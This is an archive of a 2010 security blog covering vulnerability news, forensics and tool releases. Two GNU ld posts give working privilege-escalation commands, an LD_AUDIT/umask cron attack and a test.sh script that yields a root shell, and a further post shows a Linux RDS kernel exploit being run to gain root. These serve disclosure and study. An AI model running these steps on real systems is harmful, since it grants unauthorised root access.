This tool can help to automate some analysis in the registry that could indicate compromises, presence of malware, etc.. with the help of the knowledge database.

The Botnet Wars: a Q&A

Interesting article that describes how botnets and the underground market work.
In today’s article (which will be a Q&A, a question & answer), I hope to be able to clear up the mystery behind these kits. I have been able to interview experts in the anti-malware world. They will each give their opinion on this particular subject.

Wednesday, November 3, 2010

w3af 1.0-rc4 available

Andres Riancho has announced  that a new version of w3af is available.

Just to name a few things we've done for this release:  
* We've written new HOWTO documents for our users 
* Considerably improved the speed of all grep plugins 
* Replaced Beautiful Soup by the faster libxml2 library 
* Introduced the usage of XPATH queries that will allow us to improve performance and reduce false positives 
* Fixed hundreds of bugs
On this release you'll also find that after exploiting a vulnerability youcan leverage that access using our Web Application Payloads, a feature that we developed together with Lucas Apa from Bonsai Information Security. These payloads allow you to escalate privileges and will help you get from a low privileged vulnerability (e.g. local file read) to a remote code execution. In order to try them, exploit a vulnerability, get any type of shell and then run any of the following commands: help, lsp, payload tcp (the last one will show you the open connections in the remote box).

Detecting time stamp manipulations in the file system

Awesome article from SANS computer forensics blog entitled Digital Forensics: Detecting time stamp manipulation.

The post describes how to spot time stamp manipulations when performing a forensic analysis.

The NTFS file system stores the time stamps in two different attributes ($STANDARD_INFORMATION and $FILE_NAME) and both have the fields Modification, Accessed , Change and Born.

Dave Hull used the $FILE_NAME attribute to spot the time stamp manipulations that may be done by tools like  timestomp or Metasploit.

$FILE_NAME is not a standard attribute that can be extracted with all forensics tools,  but Mark McKinnon has written a tool called mft_parser (not released yet) that can do that.

mft_parser_cl <MFT> <db> <bodyfile> <mount_point> 
The “db” argument is the name of a sqlite database that the tool creates, “bodyfile” is similar to the bodyfile that fls from Brian Carrier’s The Sleuth Kit produces, except that it will also include time stamps from NTFS’ $FILE_NAME attribute. The “mount_point” argument is prefixed to the paths in the bodyfile, so if you’re running this tool against a drive image that was drive C, you can provide “C” as an argument.

Bodyfile: listing of files and directories in a file system, with its time stamps.

ProFTPD preauth remote buffer overflow

TippingPoint , under the  zero day initiative, has published a preauth remote overflow in ProFTPD.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ProFTPD. Authentication is not required to exploit this vulnerability. 
The flaw exists within the proftpd server component which listens by default on TCP port 21. When reading user input if a TELNET_IAC escape sequence is encountered the process miscalculates a buffer length counter value allowing a user controlled copy of data to a stack buffer. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the proftpd process.

Welcome back to the 90's! This smells like a  classic exploit :D

UPDATE:  the exploit has been published as well as the advisory from Zero Day Initiative.

Emerging Threats under DDoS

As Matthew Jonkman comments   in  the emerging-sigs mailing list,  Emerging Threats is under a DDoS attack since  November 1st, but the rule distributions is not being affected.

Still taking a DDoS, but we have a good idea who it is. For the time being do NOT visit emergingthreats.net. http://www.emergingthreats.net is fine, but will be down for a while yet likely. 
Rules are unaffected, make sure you're downloading from rules.emergingthreats.net. 
Thanks for everyone's support. We're doing something right if they're spending time on us. Rally the troops! Keep up the fight!

Thursday, October 28, 2010

Wednesday, October 27, 2010

Firefox 0day was found on the Novel Peace Prize website

A hidden iframe on nobelpeaceprize.org was exploiting a Firefox 0day vulnerability via an exploit-pack.

According to Einar Oftedal, a detection executive at Norman ASA in Oslo, the official website for the Nobel Peace prize, nobelpeaceprize.org, was compromised so that it contained an iframe link to a malicious server.
“This iframe has a multi exploit backend and serves exploits for Firefox, including a working remote exploit for firefox 3.6.11,” he said in an instant message to The Register. “We didn't see any 0day for IE,” he added, referring to Microsoft's browser.

More information:
Information Security News mailing list

Tuesday, October 26, 2010

FUD in the IDS market

There has been a lot of  FUD going on in the IDS/IPS market. Stonesoft has launched a campaign saying that their product is the only able to stop some advanced attacks that are not public.

I am not an expert in the field, but there are two things that worry me:

  • Somebody saying that they can stop all the advanced attacks with "anti evasion techniques", but the are no details or whatsoever.
  • All the competitors are not able to achieve the same results.
For me, it looks like a nasty FUD trying to gain some market in the short term, but history has demonstrated that it is a bad strategy.

Anyway, I always trust people that openly discusses the problems, like researchers and open source developers.

Some comments from SourceFire
Some lolz from Daily Dave mailing list

Monday, October 25, 2010

Nessus scan through a socks Meterpreter pivot

Great article from digininja.org that explains how to scan a target network with Nessus through a Meterpreter session.

It is achieved by setting up a pivot and using the auxiliary/server/socks4 a module.  Since the  Nessus server does not natively support socks, we have to use a wrapper like proxychains or socksify, as explained in the article.

Friday, October 22, 2010

GNU ld dlopen privilege escalation

For second time this week, Tavis  Ormandy  has sent a 'bomb' to a full disclosure list in form of Linux privilege escalation with GNU ld.

In a nutshell, the problem is the following:
A whitespace-separated list of additional, user-specified, ELF shared libraries to be loaded before all others. This can be used to selectively override functions in other shared libraries. For set-user-ID/set-group-ID ELF binaries, only libraries in the standard search directories that are also set- user-ID will be loaded.
But, this is not the case with LD_AUDIT. Basically, you can load any library when executing a suid program, that will be executed with root permissions! The attack consists in finding an arbitrary library that will write a file to disk, that will be owned by root in case of executing a suid program.

The final trick is that the newly created process will inherit parent's umask. What does it mean? We can change the umask in our shell and then create a world writeable file with root rights!

A regular user being able to write files with root permissions is really a bad thing...  It means that you can create an arbitrary shell script that will be executed by Cron with root rights.  Yes, an instant root shell in the system!

The attack:

$ umask 0
#arbitrary suid program
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
# This library writes a file to disk when the PCPROFILE_OUTPUT
# environment variable is defined.
# There is another example with the liblftp-tasks library and
# the LFTP_HOME environment variable.
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > \
# Create an arbitrary but valid crontab(5) line in the file and wait for the execution
# This attack creates a suid shell named /tmp/exploit.
$ /tmp/exploit
# whoami

UPDATE:  Using crontab files is not an option because Cron does not accept files that are group or world writable. The attacker must look for other options.

UPDATE: It is possible to upload an arbitrary library that will be loaded with root privileges, dropping a root shell.

Thursday, October 21, 2010

Integrating Hydra with Nessus

Nice video from Paul Asadoorian in the tenablesecurity blog .

The blog post discusses how to integrate Hydra with Nessus  to run brute force attacks against your infrastructure: installing hydra and configuring Nessus.

The post also points to different good resources to get your list of users and passwords that will be used to perform the brute force attack.

Malware Pushers Abuse Firefox Warning Page

Nice post from Darknet that discusses a new technique used by attackers to trick the user into installing scareware.

I quote,

Hackers have subverted warnings generated by Firefox about dangerous sites to punt fake anti-virus portals.
Surfers straying onto a web page offering the “Security Tool” rogue anti-virus are offered a warning page that convincingly mimics the genuine Firefox block page. The site offers supposed updates for Mozilla’s technology that are actually scareware packages.
If Windows users apply these updates they will be falsely warned that their system is infected and continuously nagged into buying worthless scareware packages that serve only to line the pockets of cyber-scammers.
The rogue application will automatically attempt to install itself on the machines of prospective marks in cases where scripts are enabled, net security firm F-Secure warns.
Definitively, it is a really clever social engineering attack,  that will trick the users into thinking that they just got infected and they have to install this new antivirus that is already alerting about infections.

Persistence Registry keys and Windows Incident Response

The Sans Computer Forensics blog discusses how to query certain registry keys to find secondary indicators of a compromise.

Dave Hull has created a list of registry keys that can be used to run malware at boot time. He used AutoRuns from Microsoft Sysinternals to pull the list of registry keys.

The list of keys are available :

XPSP3_HKCU_Startup_Locations.txt - cannot be remotely queried
XPSP3_HKLM_Startup_Locations.txt - can be remotely queried

Privilege escalation in the Linux kernel

H security has informed about the second privilege escalation in Linux this week (the first is an error in the ld linker) with CVE-2010-3904 .

They point to the advisory as well as the PoC.

On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write arbitrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root. 

I have tested it in an old Ubuntu 10.10 RC vmware image and it worked.
Ubuntu's advisory published on October 19th.

msk@ubuntu:~$ gcc -o test linux-rds-exploit.c
msk@ubuntu:~$ ./test
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved rds_proto_ops to 0xe09d6a40
 [+] Resolved rds_ioctl to 0xe09d0000
 [+] Resolved commit_creds to 0xc016c340
 [+] Resolved prepare_kernel_cred to 0xc016c790
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)

I have checked the advisory published by RedHat and seems that RHEL  is not affected, ( RHEL 3 and 4 for sure) or I did not manage to make it work.

Debian seems to have a vulnerable kernel only in unstable (squeeze) and sid. The advisory marks all the versions as vulnerable but it should be false because stable and backports does not support RDS.

Wednesday, October 20, 2010

Honeypot for vulnerable web applications

The Honeynet Project informs that GlastopfNG  has been released. GlastopfNg is a honeypot that simulates vulnerable web servers /applications to fully understand the attacks.

GlastopfNG is a honeypot specialized on simulating a vulnerable web server/application to become a target of automated and even manual attacks. Instead of trying to block these attacks GlastopfNG tries to get as much information as possible about the attacker and the used attack itself. This gathered information can then be used in different ways to protect real applications in the future against such attacks. Today it's for example already used by hosting providers to inform owners of servers, which are attacking other servers on the Internet, that it's very likely, that their server has been hacked. This is a great additional service for their customers and can be done in a mainly automated way.

More information available in the paper.
It can be downloaded from here.

Presentation about botnets in SIGINT'10, Koln

SIGINT'10 took place between the 22nd and the 24th of May in Koln, Germany. The videos are also available and hosted by ccc.

I just saw the presentation made by Thorsten Holz and called 'Botnets in 2010 - Status Quo and Future Threats'.

As a quick resume, it does a quick introduction to the botnets and its arquitecture and then talks about Storm Worm and Waledac.

Storm Worm
  • Not centralized C & C thanks to p2p
  • Fast flux domains
  • Uses infected computers with public IP addresses to proxy the content back to the backend: spam pages or with exploit packs. It is hard to track  and offers high availability.
  • The nated machines are user to send spam and dos attacks.
  • Template based spamming. The template is sent to the bots that then send the spam.
  • Mitigation: join the network and disrupt the communication channel between the bots (Stormfucker in 25c3 CCC)
  • Successor of Storm Worm and perhaps created by the same group
  • Uses HTTP to tunnel trafic (major change) between the nated machines and the repeaters
  • multi-tier architecture ('hybrid' p2p), like storm worm
  • Static backend servers that host the content
  • Fast flux domains for C&C
  • Template based spamming.
  • The mitigation effort was called 'Operation b49' and took down the botnet in February 2010.

The video can be found here.

Tuesday, October 19, 2010

Java being massively exploited

Yes, not only Adobe is being targeted in Windows platforms even though they are making things easy for the black hats :D

As Brian Krebs says, Microsoft is warning about attacks against Java, with vulnerabilities that date back to 2008 (I have investigated attacks that used vulnerabilities patched back in 2006 and continue to be very effective)!

CVE-2008-5353 - 1,196,480 computers infected.
CVE-2009-3867 - 1,119,191 computers infected
CVE-2010-0094 -   173,123 computers infected.

Microsoft says that it kind of makes sense because Java is widely installed and nobody thinks to update it, like Adobe Acrobat. So, it is a nice candidate to be added to exploit packs and get a nice infection rate ;)

GNU ld privilege escalation

Following this post in a full disclosure list, I know about the privilege escalation  in the GNU ld linker.

Some how, it seems to be RedHat centric or a didn't manage to make it work in Debian/Ubuntu.

This is the exploit being executed in an up to date Centos 5.5

bash-3.2$ ls
exploit  payload.c  test.sh
bash-3.2$ cat test.sh
rm -rf /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

bash-3.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=root:system_r:unconfined_t:SystemLow-SystemHigh
bash-3.2$ sh test.sh
[root@localhost tmp]# cat /etc/redhat-release
CentOS release 5.5 (Final)
[root@localhost tmp]# id
uid=0(root) gid=99(nobody) groups=99(nobody) context=root:system_r:unconfined_t:SystemLow-SystemHigh
[root@localhost tmp]#

It does  not seem to work in Ubuntu 10.10:

msk@ubuntu:/tmp$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=0
kernel.yama.protected_sticky_symlinks = 0
msk@ubuntu:/tmp$ sudo sysctl -w kernel.yama.protected_nonaccess_hardlinks=0
kernel.yama.protected_nonaccess_hardlinks = 0
msk@ubuntu:/tmp$ sh test.sh
Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion `(call_map)->l_name[0] == '\0'' failed!

Resources for Building Incident Response Teams

Richard Bejtlich posts some resources for building an Incident Response Team.

New version of Metasploit Unleashed

The guys of offensive-security have updated their online curse. Metasploit Unleashed

You can find more information in their blog post.

Friday, October 15, 2010

Windows hardening: EMET

EMET (Microsoft's Enhanced Mitigation Experience Toolkit) is a tool that enables the security features that are not enabled by default on the applications. Unfortunately, Windows leaves the applications choose which security features should be enabled by setting specific flags, so many attacks can succeed  even though the security protections are enabled in the operative system.

In a nutshell, EMET is a DLL that permits to enable the security features in runtime, for applications that were compiled without it, like DEP (Data Execution Prevention) and ASLR (Address Layout Space Randomization).

You can find more information about this tool as well as examples in this article from H Security.

Tshark Fu: decrypting SSL streams

Nice article from Pauldotcom about  decrypting SSL streams with tshark, that is focused on HTTPS servers.

The article is easy to follow and explains the full process as well as the problems they found. The following points were particularly interesting:

Convert the certificate from PKCS#8 to PKCS#1
I understand that the private key must be  in PKCS1  because it is the only format understood by tshark.

openssl pkcs8 -in private.key -out rsaprivate.key -nocrypt

This point is particularly confusing... I found the following entry in the Wireshark mailing list that explains this problem.

Tshark output and the HTTP parser

The following command decrypts the stream and parses the output with tshark's internal HTTP parser.

tshark -o "ssl.desegment_ssl_records: TRUE"  \
-o "ssl.desegment_ssl_application_data: TRUE" \
-o "ssl.keys_list:,443,http,rsa_private.key"  \
-o "ssl.debug_file:rsa_private.log" -r all.pcap  \
 -R "(tcp.port eq 443)" -V

This behavior can be changed  if we want to read the raw data. This is achieved by modifying the flags in the third parameter, so we have data instead of  http

-o "ssl.keys_list:,443,data,rsa_private.key"

Thursday, October 14, 2010

Evercookies: evil user tracking

Many web browsers permit the users to delete the cookies, and this makes tracking user's behavior  more difficult. But, an evil mind thought that using other storage areas that are not meant for storing cookies could bypass the control mechanisms.

An evercookie is defined as:
Evercookie is a javascript API available that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. 
evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available on the local browser. Additionally, if evercookie has found the user has removed any of the types of cookies in question, it recreates them using each mechanism available.

Jeremiah Grossman points out in his article to an evercookie demo and to the attempts  made by Dominic White to defeat this tracking system. Dominic comments that Firefox should be safe by default (?) but Safari not, and he created shell script that deletes the temporary files.

Apparently,  Jeremiah found a way to remove this cookies in Google Chrome and only using the GUI. It is achieved by disabling the Silverlight and Flash storage settings.

Security websites attacked and public disclosure

Yes, gangs does not like their dirty laundry being made public because they want to keep working anonymously and, of course, they tend to go mad when somebody researches their activities and practices public disclosure.

Past September 23rd, Brian Krebs published a story called 'I’ll Take Two MasterCards and a Visa, Please' that appeared in main stream websites and led to take down the gang's website, that was used as a market place to sell stolen credit cards.

24 hours later, his website suffered a DoS attack with an average of 2.3 Gb and at least one IP address that belongs to Microsoft was involved. As Krebs comments in his article Pill Gang Used Microsoft’s Network in Attack on KrebsOnSecurity.com, turns out that many computers in Microsoft's net-block have been compromised for weeks and used  to route pharmacy spam sites that belong to Russian gangs.

I found particularly funny and ironic this paragraph,
 In just one of the many ironies in this story, the compromised server inside of Microsoft appears to have been running Linux, not one of Microsoft’s server technologies. According to Guilmette, all of the hacked servers used by this pill gang are Unix or Linux servers. This mode of operation matches that of “Bulker.biz,” a rogue pharmacy affiliate program known for promoting rogue “Canadian Health&Care Mall” pill sites — as well as a number of other brands — by hijacking poorly-secured Linux and Unix servers.

And the answer  from Microsoft,
Microsoft became aware of reports on Tuesday, October 12, 2010, of a device on the Microsoft network that was possibly compromised and facilitating spam attacks. Upon hearing these reports, we immediately launched an investigation. We have completed our investigation and found that two misconfigured network hardware devices in a testing lab were compromised due to human error. Those devices have been removed and we can confirm that no customer data was compromised and no production systems were affected. We are taking steps to better ensure that testing lab hardware devices that are Internet accessible are configured with proper security controls.

Tuesday, October 12, 2010

A packet repository at the University of Twente

I have read from Richard Bejtlich's Twitter  and from the Argus' Mailing list about the packet repository maintained by the University of Twente.

A quote from the wiki page,
From this location you can download anonymized packet headers (tcpdump/libcap), Netflow version 5 data and a Labeled Dataset for Intrusion Detection. Data is taken from various locations in the Netherlands. More information on the data collection and anonymization procedures can be found here.

Quick introduction to malware analysis

This post from Lenny Zeltser in the Sans Forensics Blog  introduces the whole process of malware analysis.

The post can be resumed with the following points:

  • Behavioral analysis (dynamic analysis). Helps to  understand how the malware interacts with the local and remote systems by running it in a controlled environment.
  • Code analysis (static analysis).  Decompile the binary  and analyze the malware at assembler level with the help of a debugger.
  • Memory analysis.  This method is related to the behavioral analysis because the investigator dumps the contents of the memory for further examination. This will help to spot hidden code as well as better understand how the malware behaves.

I also would add network analysis because it helps to understand how the local system interacts with remote systems, like a C &C server.  Many times the investigator must examine malware that was found in a live system and having a network capture may be handy.

Metasploit megaprimer: 300 minutes of video tutorials

Awesome post in ethicalhacker.net with more than 300 minutes of video tutorials. I point to the original resources instead of using the url shortening service that appears in the post.

1. Metasploit Megaprimer (Exploitation Basics and need for Metasploit) Part 1


2. Metasploit Megaprimer (Getting Started with Metasploit) Part 2


3. Metasploit Megaprimer Part 3 (Meterpreter Basics and using Stdapi)


4. Metasploit Megaprimer Part 4 (Meterpreter Extensions Stdapi and Priv)


5. Metasploit Megaprimer Part 5 (Understanding Windows Tokens and Meterpreter Incognito)


6. Metasploit Megaprimer Part 6 (Espia and Sniffer Extensions with Meterpreter Scripts)


7. Metasploit Megaprimer Part 7 (Metasploit Database Integration and Automating Exploitation)


8. Metasploit Megaprimer Part 8 (Post Exploitation Kung Fu)


9. Metasploit Megaprimer Part 9 (Post Exploitation Privilege Escalation)


10. Metasploit Megaprimer Part 10 (Post Exploitation Log Deletion and AV Killing)


11. Metasploit Megaprimer (Post Exploitation and Stealing Data) Part 11


12. Metasploit Megaprimer Part 12 (Post Exploitation Backdoors and Rootkits)


13. Metasploit Megaprimer Part 13 (Post Exploitation Pivoting and Port Forwarding)


14. Metasploit Megaprimer Part 14 (Backdooring Executables)


15. Metasploit Megaprimer Part 15 (Auxiliary Modules)


16. Metasploit Megaprimer Part 16 (Pass the Hash Attack)